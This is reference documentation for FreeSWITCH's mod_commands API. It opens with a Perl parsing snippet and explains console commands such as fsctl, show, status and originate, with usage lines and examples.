$cont = ;}close fl;my %DEFINES;my $reg_define = qr/[A-Za-z0-9_]+/;my $reg_function = qr/[A-Za-z0-9_]+/;my $reg_string_or_define = qr/(?:(?:$reg_define)|(?:\u0026quot;[^\u0026quot;]*\u0026quot;))/;\n#load defineswhile ($cont =~ / ^\\s* #define \\s+ ($reg_define) \\s+ \u0026quot;([^\u0026quot;]*)\u0026quot; /mgx){ warn \u0026ldquo;$1 is #defined multiple times\u0026rdquo; if ($DEFINES{$1}); $DEFINES{$1} = $2;}\nsub resolve_str_or_define($){ my ($str) = @_; if ($str =~ s/^\u0026quot;// \u0026amp;\u0026amp; $str =~ s/\u0026quot;$//){ #if starts and ends with a quote strip them off and return the str return $str; } warn \u0026ldquo;Unable to resolve define: $str\u0026rdquo; if (! $DEFINES{$str}); return $DEFINES{$str};}#parse commandswhile ($cont =~ / SWITCH_ADD_API \\s* ( ([^,]+) #interface $1 ,\\s* ($reg_string_or_define) # command $2 ,\\s* ($reg_string_or_define) # command description $3 ,\\s* ($reg_function) # function $4 ,\\s* ($reg_string_or_define) # usage $5 \\s*); /sgx){ my ($interface,$command,$descr,$function,$usage) = ($1,$2,$3,$4,$5); $command = resolve_str_or_define($command); $descr = resolve_str_or_define($descr); $usage = resolve_str_or_define($usage); warn \u0026ldquo;Found a not command interface of: $interface for command: $command\u0026rdquo; if ($interface ne \u0026ldquo;commands_api_interface\u0026rdquo;); print \u0026ldquo;$command \u0026ndash; $descr \u0026ndash; $usage\\n\u0026rdquo;;} Core Commands Implemented in http://fisheye.freeswitch.org/browse/freeswitch.git/src/mod/applications/mod_commands/mod_commands.cFormat of Returned DataResults of some status and listing commands are presented in comma delimited lists by default. Data returned from some modules may also contain commas, making it difficult to automate result processing. They may be able to be retrieved in an XML format by appending the string \u0026ldquo;as xml\u0026rdquo; to the end of the command string, or as json using \u0026ldquo;as json\u0026rdquo;, or change the delimiter from comma to something else using \u0026ldquo;as delim |\u0026rdquo;. acl Compare an ip to an Access Control ListUsage: acl \u0026lt;list_name\u0026gt; alias Alias: a means to save some keystrokes on commonly used commands.Usage: alias add | del [|*]Example:freeswitch\u0026gt; alias add reloadall reloadacl reloadxml+OKfreeswitch\u0026gt; alias add unreg sofia profile internal flush_inbound_reg+OKYou can add aliases that persist across restarts using the stickyadd argument:freeswitch\u0026gt; alias stickyadd reloadall reloadacl reloadxml+OKOnly really works from the console, not fs_cli. bgapi Execute an API command in a thread.Usage: bgapi [ ] complete Complete.Usage: complete add |del [|*] cond Evaluate a conditional expression.Usage: cond ? : Operators supported by are:\n== (equal to) != (not equal to) (greater than)\n= (greater than or equal to)\n\u0026lt; (less than) \u0026lt;= (less than or equal to) How are values compared?\ntwo strings are compared as strings two numbers are compared as numbers a string and a number are compared as strlen(string) and numbers For example, foo == 3 evaluates to true, and foo == three to false.\nExamples (click to expand)\nExample:Return true if first value is greater than the secondcond 5 \u0026gt; 3 ? true : falsetrueExample in dialplan:Slightly more complex example:\nNote about syntaxThe whitespace around the question mark and colon are required since FS-5945. Before that, they were optional. If the spaces are missing, the cond function will return -ERR. domain_exists Check if a FreeSWITCH domain exists.Usage: domain_exists eval Eval (noop). Evaluates a string, expands variables. Those variables that are set only during a call session require the uuid of the desired session or else return \u0026ldquo;-ERR no reply\u0026rdquo;.Usage: eval [uuid: ]Examples:eval ${domain}10.15.0.94eval Hello, World!Hello, World!eval uuid:e72aff5c-6838-49a8-98fb-84c90ad840d9 ${channel-state}CS_EXECUTE expand Execute an API command with variable expansion.Usage: expand [uuid: ] Example:expand originate sofia/internal/1001%${domain} 9999In this example the value of ${domain} is expanded. If the domain were, for example, \u0026ldquo;192.168.1.1\u0026rdquo; then this command would be executed:originate sofia/internal/1001%192.168.1.1 9999 fsctl Send control messages to FreeSWITCH.USAGE: fsctl [ api_expansion [on|off] | calibrate_clock | debug_level [level] | debug_sql | default_dtmf_duration [n] | flush_db_handles | hupall | last_sps | loglevel [level] | max_dtmf_duration [n] | max_sessions [n] | min_dtmf_duration [n] | min_idle_cpu [d] | pause [inbound|outbound] | pause_check [inbound|outbound] | ready_check | reclaim_mem | recover | resume [inbound|outbound] | save_history | send_sighup | shutdown [cancel|elegant|asap|now|restart] | shutdown_check | sps | sps_peak_reset | sql [start] | sync_clock | sync_clock_when_idle | threaded_system_exec | verbose_events [on|off] ]\nfsctl arguments api_expansion Usage: fsctl api_expansion [on|off]Toggles API expansion. With it off, no API functions can be expanded inside channel variables like ${show channels} This is a specific security mode that is not often used. calibrate_clock Usage: fsctl calibrate_clockRuns an algorithm to compute how long it actually must sleep in order to sleep for a true 1ms. It\u0026rsquo;s only useful in older kernels that don\u0026rsquo;t have timerfd. In those older kernels FS auto detects that it needs to do perform that computation. This command just repeats the calibration. **debug_level ** Usage: fsctl debug_level [level]Set the amount of debug information that will be posted to the log. 1 is less verbose while 9 is more verbose. Additional debug messages will be posted at the ALERT loglevel.0 - fatal errors, panic1 - critical errors, minimal progress at subsystem level2 - non-critical errors3 - warnings, progress messages5 - signaling protocol actions (incoming packets, \u0026hellip;)7 - media protocol actions (incoming packets, \u0026hellip;)9 - entering/exiting functions, very verbatim progress\ndebug_sql Usage: fsctl debug_sqlToggle core SQL debugging messages on or off each time this command is invoked. Use with caution on busy systems. In order to see all messages issue the \u0026ldquo;logelevel debug\u0026rdquo; command on the fs_cli interface. default_dtmf_duration Usage: fsctl default_dtmf_duration [int]int = number of clock ticksExample:fsctl default_dtmf_duration 2000This example sets the default_dtmf_duration switch parameter to 250ms. The number is specified in clock ticks (CT) where duration (milliseconds) = CT / 8 or CT = duration * 8The default_dtmf_duration specifies the DTMF duration to use on originated DTMF events or on events that are received without a duration specified. This value is bounded on the lower end by min_dtmf_duration and on the upper end by max_dtmf_duration. So max_dtmf_duration \u0026gt;= default_dtmf_duration \u0026gt;= min_dtmf_duration . This value can be set persistently in switch.conf.xmlTo check the current value:fsctl default_dtmf_duration 0FS recognizes a duration of 0 as a status check. Instead of setting the value to 0, it simply returns the current value. flush_db_handles Usage: fsctl flush_db_handlesFlushes cached database handles from the core db handlers. FreeSWITCH reuses db handles whenever possible, but a heavily loaded FS system can accumulate a large number of db handles during peak periods while FS continues to allocate new db handles to service new requests in a FIFO manner. \u0026ldquo;fsctl flush_db_handles\u0026rdquo; closes db connections that are no longer needed to avoid exceeding connections to the database server. hupall Usage: fsctl hupall \u0026lt;clearing_type\u0026gt; dialed_ext Disconnect existing calls to a destination and post a clearing cause.For example, to kill an active call with normal clearing and the destination being extension 1000:fsctl hupall normal_clearing dialed_ext 1000 last_sps Usage: fsctl last_spsQuery the actual sessions-per-second.fsctl last_sps+OK last sessions per second: 723987253(Your mileage might vary.) loglevel Usage: fsctl loglevel [level]Filter much detail the log messages will contain when displayed on the fs_cli interface. See mod_console for legal values of \u0026ldquo;level\u0026rdquo; and further discussion.The available loglevels can be specified by number or name:0 - CONSOLE1 - ALERT2 - CRIT3 - ERR4 - WARNING5 - NOTICE6 - INFO7 - DEBUG max_sessions Usage: fsctl max_sessions [int]Set how many simultaneous call sessions FS will allow. This value can be ascertained by load testing, but is affected by processor speed and quantity, network and disk bandwidth, choice of codecs, and other factors. See switch.conf.xml for the persistent setting max-sessions. max_dtmf_duration Usage: fsctl max_dtmf_duration [int]Default = 192000 clock ticksExample:fsctl max_dtmf_duration 80000This example sets the max_dtmf_duration switch parameter to 10,000ms (10 seconds). The integer is specified in clock ticks (CT) where CT / 8 = ms. The max_dtmf_duration caps the playout of a DTMF event at the specified duration. Events exceeding this duration will be truncated to this duration. You cannot configure a duration that exceeds this setting. This setting can be lowered, but cannot exceed 192000 (the default). This setting cannot be set lower than min_dtmf_duration. This setting can be set persistently in switch.conf.xml as max-dtmf-duration.To query the current value:fsctl max_dtmf_duration 0FreeSWITCH recognizes a duration of 0 as a status check. Instead of setting the value to 0, it simply returns the current value. min_dtmf_duration Usage: fsctl min_dtmf_duration [int]Default = 400 clock ticksExample:fsctl min_dtmf_duration 800This example sets the min_dtmf_duration switch parameter to 100ms. The integer is specified in clock ticks (CT) where CT / 8 = ms. The min_dtmf_duration specifies the minimum DTMF duration to use on outgoing events. Events shorter than this will be increased in duration to match min_dtmf_duration. You cannot configure a DTMF duration on a profile that is less than this setting. You may increase this value, but cannot set it lower than 400 (the default). This value cannot exceed max_dtmf_duration. This setting can be set persistently in switch.conf.xml as min-dtmf-duration.It is worth noting that many devices squelch in-band DTMF when sending RFC 2833. Devices that squelch in-band DTMF have a certain reaction time and clamping time which can sometimes reach as high as 40ms, though most can do it in less than 20ms. As the shortness of your DTMF event duration approaches this clamping threshold, the risk of your DTMF being ignored as a squelched event increases. If your call is always IP-IP the entire route, this is likely not a concern. However, when your call is sent to the PSTN, the RFC 2833 DTMF events must be encoded in the audio stream. This means that other devices down the line (possibly a PBX or IVR that you are calling) might not hear DTMF tones that are long enough to decode and so will ignore them entirely. For this reason, it is recommended that you do not send DTMF events shorter than 80ms.Checking the current value:fsctl min_dtmf_duration 0FreeSWITCH recognizes a duration of 0 as a status check. Instead of setting the value to 0, it simply returns the current value. min_idle_cpu Usage: fsctl min_idle_cpu [int]Allocates the minimum percentage of CPU idle time available to other processes to prevent FreeSWITCH from consuming all available CPU cycles.Example:fsctl min_idle_cpu 10This allocates a minimum of 10% CPU idle time which is not available for processing by FS. Once FS reaches 90% CPU consumption it will respond with cause code 503 to additional SIP requests until its own usage drops below 90%, while reserving that last 10% for other processes on the machine. pause Usage: fsctl pause [inbound|outbound]Pauses the ability to receive inbound or originate outbound calls, or both directions if the keyword is omitted. Executing fsctl pause inbound will also prevent registration requests from being processed. Executing fsctl pause outbound will result in the Critical log message \u0026ldquo;The system cannot create any outbound sessions at this time\u0026rdquo; in the FS log.Use resume with the corresponding argument to restore normal operation. pause_check Usage: fsctl pause_check [inbound|outbound]Returns true if the specified mode is active.Examples:fsctl pause_check inboundtrueindicates that inbound calls and registrations are paused. Use fsctl resume inbound to restore normal operation.fsctl pause_checktrueindicates that both inbound and outbound sessions are paused. Use fsctl resume to restore normal operation. ready_check Usage: fsctl ready_checkReturns true if the system is in the ready state, as opposed to awaiting an elegant shutdown or other not-ready state. reclaim_mem Usage: fsctl reclaim_mem recover Usage: fsctl recoverSends an endpoint–specific recover command to each channel detected as recoverable. This replaces “sofia recover” and makes it possible to have multiple endpoints besides SIP implement recovery. resume Usage: fsctl resume [inbound|outbound]Resumes normal operation after pausing inbound, outbound, or both directions of call processing by FreeSWITCH.Example:fsctl resume inbound+OKResumes processing of inbound calls and registrations. Note that this command always returns +OK, but the same keyword must be used that corresponds to the one used in the pause command in order to take effect. save_history Usage: fsctl save_historyWrite out the command history in anticipation of executing a configuration that might crash FS. This is useful when debugging a new module or script to allow other developers to see what commands were executed before the crash. send_sighup Usage: fsctl send_sighupDoes the same thing that killing the FS process with -HUP would do without having to use the UNIX kill command. Useful in environments like Windows where there is no kill command or in cron or other scripts by using fs_cli -x \u0026ldquo;fsctl send_sighup\u0026rdquo; where the FS user process might not have privileges to use the UNIX kill command. shutdown Usage: fsctl shutdown [asap|asap restart|cancel|elegant|now|restart|restart asap|restart elegant]\ncancel - discontinue a previous shutdown request. elegant - wait for all traffic to stop, while allowing new traffic. asap - wait for all traffic to stop, but deny new traffic. now - shutdown FreeSWITCH immediately. restart - restart FreeSWITCH immediately following the shutdown. When giving \u0026ldquo;elegant\u0026rdquo;, \u0026ldquo;asap\u0026rdquo; or \u0026ldquo;now\u0026rdquo; it\u0026rsquo;s also possible to add the restart command: shutdown_check Usage: fsctl shutdown_checkReturns true if FS is shutting down, or shutting down and restarting. sps Usage: fsctl sps [int]This changes the sessions-per-second limit from the value initially set in switch.conf sync_clock Usage: fsctl sync_clockFreeSWITCH will not trust the system time. It gets one sample of system time when it first starts and uses the monotonic clock after that moment. You can sync it back to the current value of the system\u0026rsquo;s real-time clock with fsctl sync_clockNote: fsctl sync_clock immediately takes effect, which can affect the times on your CDRs. You can end up underbilling/overbilling, or even calls hungup before they originated. e.g. if FS clock is off by 1 month, then your CDRs will show calls that lasted for 1 month!See fsctl sync_clock_when_idle which is much safer. sync_clock_when_idle Usage: fsctl sync_clock_when_idleSynchronize the FreeSWITCH clock to the host machine\u0026rsquo;s real-time clock, but wait until there are 0 channels in use. That way it doesn\u0026rsquo;t affect any CDRs. verbose_events Usage: fsctl verbose_events [on|off]Enables verbose events. Verbose events have every channel variable in every event for a particular channel. Non-verbose events have only the pre-selected channel variables in the event headers.See switch.conf.xml for the persistent setting of verbose-channel-events.\nglobal_getvar Gets the value of a global variable. If the parameter is not provided then it gets all the global variables.Usage: global_getvar [] global_setvar Sets the value of a global variable.Usage: global_setvar =Example:global_setvar outbound_caller_id=2024561000 group_call Returns the bridge string defined in a call group.Usage: group_call group@domain[+F|+A|+E]+F will return the group members in a serial fashion separated by | (the pipe character)+A (default) will return them in a parallel fashion separated by , (comma)+E will return them in a enterprise fashion separated by :_: (colon underscore colon).There is no space between the domain and the optional flag. See Groups in the XML User Directory for more information.Please note: If you need to have outgoing user variables set in leg B, make sure you don\u0026rsquo;t have dial-string and group-dial-string in your domain or dialed group variables list; instead set dial-string or group-dial-string in the default group of the user. This way group_call will return user/101 and user/ would set all your user variables to the leg B channel.The B leg receives a new variable, dialed_group, containing the full group name. help Show help for all the API commands.Usage: help host_lookup Performs a DNS lookup on a host name.Usage: host_lookup hupall Disconnect existing channels.Usage: hupall [ ]All channels with set to will be disconnected with code.Example:originate {foo=bar}sofia/internal/someone1@server.com,sofia/internal/someone2@server.com \u0026amp;parkhupall normal_clearing foo barTo hang up all calls on the switch indiscriminately:hupall system_shutdown in_group Determine if a user is a member of a group.Usage: in_group [@] \u0026lt;group_name\u0026gt; is_lan_addr See if an IP is a LAN address.Usage: is_lan_addr json JSON APIUsage: json {\u0026ldquo;command\u0026rdquo; : \u0026ldquo;\u0026hellip;\u0026rdquo;, \u0026ldquo;data\u0026rdquo; : \u0026ldquo;\u0026hellip;\u0026rdquo;}Example\u0026gt; json {\u0026ldquo;command\u0026rdquo; : \u0026ldquo;status\u0026rdquo;, \u0026ldquo;data\u0026rdquo; : \u0026ldquo;\u0026rdquo;} {\u0026ldquo;command\u0026rdquo;:\u0026ldquo;status\u0026rdquo;,\u0026ldquo;data\u0026rdquo;:\u0026quot;\u0026quot;,\u0026ldquo;status\u0026rdquo;:\u0026ldquo;success\u0026rdquo;,\u0026ldquo;response\u0026rdquo;:{\u0026ldquo;systemStatus\u0026rdquo;:\u0026ldquo;ready\u0026rdquo;,\u0026ldquo;uptime\u0026rdquo;:{\u0026ldquo;years\u0026rdquo;:0,\u0026ldquo;days\u0026rdquo;:20,\u0026ldquo;hours\u0026rdquo;:20,\u0026ldquo;minutes\u0026rdquo;:37,\u0026ldquo;seconds\u0026rdquo;:4,\u0026ldquo;milliseconds\u0026rdquo;:254,\u0026ldquo;microseconds\u0026rdquo;:44},\u0026ldquo;version\u0026rdquo;:\u0026ldquo;1.6.9 -16-d574870 64bit\u0026rdquo;,\u0026ldquo;sessions\u0026rdquo;:{\u0026ldquo;count\u0026rdquo;:{\u0026ldquo;total\u0026rdquo;:132,\u0026ldquo;active\u0026rdquo;:0,\u0026ldquo;peak\u0026rdquo;:2,\u0026ldquo;peak5Min\u0026rdquo;:0,\u0026ldquo;limit\u0026rdquo;:1000},\u0026ldquo;rate\u0026rdquo;:{\u0026ldquo;current\u0026rdquo;:0,\u0026ldquo;max\u0026rdquo;:30,\u0026ldquo;peak\u0026rdquo;:2,\u0026ldquo;peak5Min\u0026rdquo;:0}},\u0026ldquo;idleCPU\u0026rdquo;:{\u0026ldquo;used\u0026rdquo;:0,\u0026ldquo;allowed\u0026rdquo;:99.733333},\u0026ldquo;stackSizeKB\u0026rdquo;:{\u0026ldquo;current\u0026rdquo;:240,\u0026ldquo;max\u0026rdquo;:8192}}} load Load external moduleUsage: load \u0026lt;mod_name\u0026gt;Example:load mod_v8 md5 Return MD5 hash for the given input dataUsage: md5 hash-keyExample:md5 freeswitch-is-awesome765715d4f914bf8590d1142b6f64342e module_exists Check if module is loaded.Usage: module_exists Example:module_exists mod_event_sockettrue msleep Sleep for x number of millisecondsUsage: msleep nat_map Manage Network Address Translation mapping.Usage: nat_map [status|reinit|republish] | [add|del] [tcp|udp] [sticky] | [mapping] \u0026lt;enable|disable\u0026gt;\nstatus - Gives the NAT type, the external IP, and the currently mapped ports. reinit - Completely re-initializes the NAT engine. Use this if you have changed routes or have changed your home router from NAT mode to UPnP mode. republish - Causes FreeSWITCH to republish the NAT maps. This should not be necessary in normal operation. mapping - Controls whether port mapping requests will be sent to the NAT (the command line option of -nonatmap can set it to disable on startup). This gives the ability of still using NAT for getting the public IP without opening the ports in the NAT. Note: sticky makes the mapping stay across FreeSWITCH restarts. It gives you a permanent mapping.Warning: If you have multiple network interfaces with unique IP addresses defined in sip profiles using the same port, nat_map will get confused when it tries to map the same ports for multiple profiles. Set up a static mapping between the public address and port and the private address and port in the sip_profiles to avoid this problem. regex Evaluate a regex (regular expression).Usage: regex |[|][|(n|b)]regex m://[/][/(n|b)]regex m:~~[~][~(n|b)]This command behaves differently depending upon whether or not a substitution string and optional flag is supplied:\nIf a subst is not supplied, regex returns either \u0026ldquo;true\u0026rdquo; if the pattern finds a match or \u0026ldquo;false\u0026rdquo; if not. If a subst is supplied, regex returns the subst value on a true condition. If a subst is supplied, on a false (no pattern match) condition regex returns: the source string with no flag; with the n flag regex returns null which forces the response \u0026ldquo;-ERR no reply\u0026rdquo; from regex; with the b flag regex returns \u0026ldquo;false\u0026rdquo; The regex delimiter defaults to the | (pipe) character. The delimiter may be changed to ~ (tilde) or / (forward slash) by prefixing the regex with m:Examples:regex test1234|\\d \u0026lt;== Returns \u0026ldquo;true\u0026rdquo;regex m:/test1234/\\d \u0026lt;== Returns \u0026ldquo;true\u0026rdquo;regex m:~test1234~\\d \u0026lt;== Returns \u0026ldquo;true\u0026rdquo;regex test|\\d \u0026lt;== Returns \u0026ldquo;false\u0026rdquo;regex test1234|(\\d+)|$1 \u0026lt;== Returns \u0026ldquo;1234\u0026rdquo;regex sip:foo@bar.baz|^sip:(.*)|$1 \u0026lt;== Returns \u0026ldquo;foo@bar.baz\u0026rdquo;regex testingonetwo|(\\d+)|$1 \u0026lt;== Returns \u0026ldquo;testingonetwo\u0026rdquo; (no match)regex m:~30~/^(10|20|40)$/~$1 \u0026lt;== Returns \u0026ldquo;30\u0026rdquo; (no match)regex m:~30~/^(10|20|40)$/~$1~n \u0026lt;== Returns \u0026ldquo;-ERR no reply\u0026rdquo; (no match)regex m:~30~/^(10|20|40)$/~$1~b \u0026lt;== Returns \u0026ldquo;false\u0026rdquo; (no match)Logic in revision 14727 if the source string matches the result then the condition was false however there was a match and it is 1001.regex 1001|/(^\\d{4}$)/|$1\nSee also Regular_Expression reload Reload a module.Usage: reload \u0026lt;mod_name\u0026gt; reloadacl Reload Access Control Lists after modifying them in autoload_configs/acl.conf.xml and as defined in extensions in the user directory conf/directory/*.xmlUsage: reloadacl [reloadxml] reloadxml Reload conf/freeswitch.xml settings after modifying configuration files.Usage: reloadxml show Display various reports, VERY useful for troubleshooting and confirming proper configuration of FreeSWITCH. Arguments can not be abbreviated, they must be specified fully.Usage: show [ aliases | api | application | bridged_calls | calls [count] | channels [count|like ] | chat | codec | complete | detailed_bridged_calls | detailed_calls | dialplan | endpoint | file | interface_types | interfaces | limits management | modules | nat_map |registrations | say | tasks | timer | ] [as xml|as delim ]XML formatted:show foo as xmlChange delimiter:show foo as delim |\naliases – list defined command aliases api – list API commands exposed by loadable modules application – list applications exposed by loadable modules, notably mod_dptools bridged_calls – deprecated, use \u0026ldquo;show calls\u0026rdquo; calls [count] – list details of currently active calls; the keyword \u0026ldquo;count\u0026rdquo; eliminates the details and only prints the total count of calls channels [count|like ] – list current channels; see Channels vs Calls count – show only the count of active channels, no details like – filter results to include only channels that contain in uuid, channel name, cid_number, cid_name, presence data fields. chat – list chat interfaces codec – list codecs that are currently loaded in FreeSWITCH complete – list command argument completion tables detailed_bridged_calls – same as \u0026ldquo;show detailed_calls\u0026rdquo; detailed_calls – like \u0026ldquo;show calls\u0026rdquo; but with more fields dialplan – list dialplan interfaces endpoint – list endpoint interfaces currently available to FS file – list supported file format interfaces interface_types – list all interface types with a summary count of each type of interface available interfaces – enumerate all available interfaces by type, showing the module which exposes each interface limits – list database limit interfaces management – list management interfaces module – enumerate modules and the path to each nat_map – list Network Address Translation map registrations – enumerate user extension registrations say – enumerate available TTS (text-to-speech) interface modules with language supported tasks – list FS tasks timer – list timer modules Tips For Showing Calls and Channels The best way to get an understanding of all of the show calls/channels is to use them and observe the results. To display more fields:\nshow detailed_calls show bridged_calls show detailed_bridged_calls These three take the expand on information shown by \u0026ldquo;show calls\u0026rdquo;. Note that \u0026ldquo;show detailed_calls\u0026rdquo; replaces \u0026ldquo;show distinct_channels\u0026rdquo;. It provides similar, but more detailed, information. Also note that there is no \u0026ldquo;show detailed_channels\u0026rdquo; command, however using \u0026ldquo;show detailed_calls\u0026rdquo; will yield the same net result: FreeSWITCH lists detailed information about one-legged calls and bridged calls by using \u0026ldquo;show detailed_calls\u0026rdquo;, which can be quite useful while configuring and troubleshooting FS.Filtering ResultsTo filter only channels matching a specific uuid or related to a specific call, set the presence_data channel variable in the bridge or originate application to a unique string. Then you can use:show channels like footo list only those channels of interest. The like directive filters on these fields:\nuuid channel name caller id name caller id number presence_data NOTE: presence_data must be set during bridge or originate and not after the channel is established. shutdown Stop the FreeSWITCH program.Usage: shutdownThis only works from the console. To shutdown FS from an API call or fs_cli, you should use \u0026ldquo;fsctl shutdown\u0026rdquo; which offers a number of options.Shutdown from the console ignores arguments and exits immediately!\nstatus Show current FS status. Very helpful information to provide when asking questions on the mailing list or irc channel.Usage: statusfreeswitch@internal\u0026gt; statusUP 17 years, 20 days, 10 hours, 10 minutes, 31 seconds, 571 milliseconds, 721 microsecondsFreeSWITCH (Version 1.5.8b git 87751f9 2013-12-13 18:13:56Z 32bit) is ready 53987253 session(s) since startup 127 session(s) - peak 127, last 5min 253 55 session(s) per Sec out of max 60, peak 55, last 5min 253 1000 session(s) max min idle cpu 0.00/97.71 strftime_tz Displays formatted time, converted to a specific timezone. See /usr/share/zoneinfo/zone.tab for the standard list of Linux timezones.Usage: strftime_tz [format_string]Example:strftime_tz US/Eastern %Y-%m-%d %T unload Unload external module.Usage: unload \u0026lt;mod_name\u0026gt; version Show version of the switchUsage: version [short]Examples:freeswitch@internal\u0026gt; versionFreeSWITCH Version 1.5.8b+git~20131213T181356Z~87751f9eaf~32bit (git 87751f9 2013-12-13 18:13:56Z 32bit)freeswitch@internal\u0026gt; version short1.5.8b xml_locate Write active xml tree or specified branch to stdout.Usage: xml_locate [root | | \u0026lt;tag_attr_name\u0026gt; \u0026lt;tag_attr_val\u0026gt;]xml_locate root will return all XML being used by FreeSWITCHxml_locate : Will return the XML corresponding to the specified xml_locate directoryxml_locate configurationxml_locate dialplanxml_locate phrasesExample:xml_locate directory domain name example.comxml_locate configuration configuration name ivr.conf xml_wrap Wrap another API command in XML.Usage: xml_wrap Call Management Commands break Deprecated. See uuid_break. create_uuid Creates a new UUID and returns it as a string.Usage: create_uuid originate Originate a new call.Usageoriginate \u0026lt;call_url\u0026gt; |\u0026amp;\u0026lt;application_name\u0026gt;(\u0026lt;app_args\u0026gt;) [] [] [\u0026lt;cid_name\u0026gt;] [\u0026lt;cid_num\u0026gt;] [\u0026lt;timeout_sec\u0026gt;]\nFreeSWITCH will originate a call to \u0026lt;call_url\u0026gt; as Leg A. If that leg supervises within 60 seconds FS will continue by searching for an extension definition in the specified dialplan for or else execute the application that follows the \u0026amp; along with its arguments.Originate Arguments Arguments \u0026lt;call_url\u0026gt; URL you are calling. For more info on sofia SIP URL syntax see: FreeSwitch Endpoint Sofia Destination, one of: Destination number to search in dialplan; note that registered extensions will fail this way, use \u0026amp;bridge(user/xxxx) instead \u0026amp;\u0026lt;application_name\u0026gt;(\u0026lt;app_args\u0026gt;) \u0026ldquo;\u0026amp;\u0026rdquo; indicates what follows is an application name, not an exten (\u0026lt;app_args\u0026gt;) is optional (not all applications require parameters, e.g. park) The most commonly used application names include:park, bridge, javascript/lua/perl, playback (remove mod_native_file). Note: Use single quotes to pass arguments with spaces, e.g. \u0026lsquo;\u0026amp;lua(test.lua arg1 arg2)\u0026rsquo; Note: There is no space between \u0026amp; and the application name Defaults to \u0026lsquo;XML\u0026rsquo; if not specified. Defaults to \u0026lsquo;default\u0026rsquo; if not specified. \u0026lt;cid_name\u0026gt; CallerID name to send to Leg A. \u0026lt;cid_num\u0026gt; CallerID number to send to Leg A. \u0026lt;timeout_sec\u0026gt; Timeout in seconds; default = 60 seconds. Originate Variables Variables These variables can be prepended to the dial string inside curly braces and separated by commas. Example:originate {sip_auto_answer=true,return_ring_ready=false}user/1001 9198Variables within braces must be separated by a comma.\ngroup_confirm_key group_confirm_file forked_dial fail_on_single_reject ignore_early_media - must be defined on Leg B in bridge or originate command to stop remote ringback from being heard by Leg A return_ring_ready originate_retries originate_retry_sleep_ms origination_caller_id_name origination_caller_id_number originate_timeout sip_auto_answer Description of originate\u0026rsquo;s related variables Originate Examples Examples You can call a locally registered sip endpoint 300 and park the call like so Note that the \u0026ldquo;example\u0026rdquo; profile used here must be the one to which 300 is registered. Also note the use of % instead of @ to indicate that it is a registered extension.originate sofia/example/300%pbx.internal \u0026amp;park()Or you could instead connect a remote sip endpoint to extension 8600originate sofia/example/300@foo.com 8600Or you could instead connect a remote SIP endpoint to another remote extensionoriginate sofia/example/300@foo.com \u0026amp;bridge(sofia/example/400@bar.com)Or you could even run a Javascript application test.jsoriginate sofia/example/1000@somewhere.com \u0026amp;javascript(test.js)To run a javascript with arguments you must surround it in single quotes.originate sofia/example/1000@somewhere.com \u0026lsquo;\u0026amp;javascript(test.js myArg1 myArg2)\u0026rsquo;Setting channel variables to the dial stringoriginate {ignore_early_media=true}sofia/mydomain.com/18005551212@1.2.3.4 15555551212Setting SIP header variables to send to another FS box during originateoriginate {sip_h_X-varA=111,sip_h_X-varB=222}sofia/mydomain.com/18005551212@1.2.3.4 15555551212Note: you can set any channel variable, even custom ones. Use single quotes to enclose values with spaces, commas, etc.originate {my_own_var=my_value}sofia/mydomain.com/that.ext@1.2.3.4 15555551212originate {my_own_var=\u0026lsquo;my value'}sofia/mydomain.com/that.ext@1.2.3.4 15555551212If you need to fake the ringback to the originated endpoint try this:originate {ringback='%(2000,4000,440.0,480.0)'}sofia/example/300@foo.com \u0026amp;bridge(sofia/example/400@bar.com)To specify a parameter to the Leg A call and the Leg B bridge application:originate {\u0026lsquo;origination_caller_id_number=2024561000\u0026rsquo;}sofia/gateway/whitehouse.gov/2125551212 \u0026amp;bridge([\u0026rsquo;effective_caller_id_number=7036971379\u0026rsquo;]sofia/gateway/pentagon.gov/3035554499)\nIf you need to make originate return immediately when the channel is in \u0026ldquo;Ring-Ready\u0026rdquo; state try this:originate {return_ring_ready=true}sofia/gateway/someprovider/919246461929 \u0026amp;socket(\u0026lsquo;127.0.0.1:8082 async full\u0026rsquo;)More info on return_ring_readyYou can even set music on hold for the ringback if you want:originate {ringback='/path/to/music.wav'}sofia/gateway/name/number \u0026amp;bridge(sofia/gateway/siptoshore/12425553741)You can originate a call in the background (asynchronously) and playback a message with a 60 second timeout.bgapi originate {ignore_early_media=true,originate_timeout=60}sofia/gateway/name/number \u0026amp;playback(message)You can specify the UUID of an originated call by doing the following:\nUse create_uuid to generate a UUID to use. This will allow you to kill an originated call before it is answered by using uuid_kill. If you specify origination_uuid it will remain the UUID for the answered call leg for the whole session. originate {origination_uuid=...}user/100@domain.name.comHere\u0026rsquo;s an example of originating a call to the echo conference (an external sip URL) and bridging it to a local user\u0026rsquo;s phone:originate sofia/internal/9996@conference.freeswitch.org \u0026amp;bridge(user/105@default)Here\u0026rsquo;s an example of originating a call to an extension in a different context than \u0026lsquo;default\u0026rsquo; (required for the FreePBX which uses context_1, context_2, etc.):originate sofia/internal/2001@foo.com 3001 xml context_3You can also originate to multiple extensions as follows:originate user/1001,user/1002,user/1003 \u0026amp;park()To put an outbound call into a conference at early media, either of these will work (they are effectively the same thing)originate sofia/example/300@foo.com \u0026amp;conference(conf_uuid-TEST_CON)originate sofia/example/300@foo.com conference:conf_uuid-TEST_CON inlineSee mod_dptools: Inline Dialplan for more detail on \u0026lsquo;inline\u0026rsquo; DialplansAn example of using loopback and inline on the A-leg can be found in this mailing list post pause Pause playback of recorded media that was started with uuid_broadcast.Usagepause \u0026lt;on|off\u0026gt;Turning pause \u0026ldquo;on\u0026rdquo; activates the pause function, i.e. it pauses the playback of recorded media. Turning pause \u0026ldquo;off\u0026rdquo; deactivates the pause function and resumes playback of recorded media at the same point where it was paused.Note: always returns -ERR no reply when successful; returns -ERR No such channel! when uuid is invalid. uuid_answer Answer a channelUsageuuid_answer See Also\nmod_dptools: answer uuid_audio Adjust the audio levels on a channel or mute (read/write) via a media bug.Usageuuid_audio [start [read|write] [[mute|level] ]|stop] is in the range from -4 to 4, 0 being the default value.Level is required for both mute|level params:freeswitch@internal\u0026gt; uuid_audio 0d7c3b93-a5ae-4964-9e4d-902bba50bd19 start write mute freeswitch@internal\u0026gt; uuid_audio 0d7c3b93-a5ae-4964-9e4d-902bba50bd19 start write level (This command behaves funky. Requires further testing to vet all arguments. - JB)See Also\nmod_dptools: set audio level uuid_break Break out of media being sent to a channel. For example, if an audio file is being played to a channel, issuing uuid_break will discontinue the media and the call will move on in the dialplan, script, or whatever is controlling the call.Usage: uuid_break [all]If the all flag is used then all audio files/prompts/etc. that are queued up to be played to the channel will be stopped and removed from the queue, otherwise only the currently playing media will be stopped. uuid_bridge Bridge two call legs 